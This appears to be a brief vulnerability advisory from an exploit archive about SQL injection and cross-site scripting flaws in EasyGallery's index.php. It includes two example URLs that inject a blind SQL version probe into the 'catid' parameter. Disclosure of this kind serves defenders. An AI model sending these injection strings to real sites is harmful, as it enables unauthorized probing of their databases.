EasyGallery 'index.php' Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

EasyGallery 'index.php' Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4
http://www.example.com/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5

/data/vulnerabilities/exploits/28233.html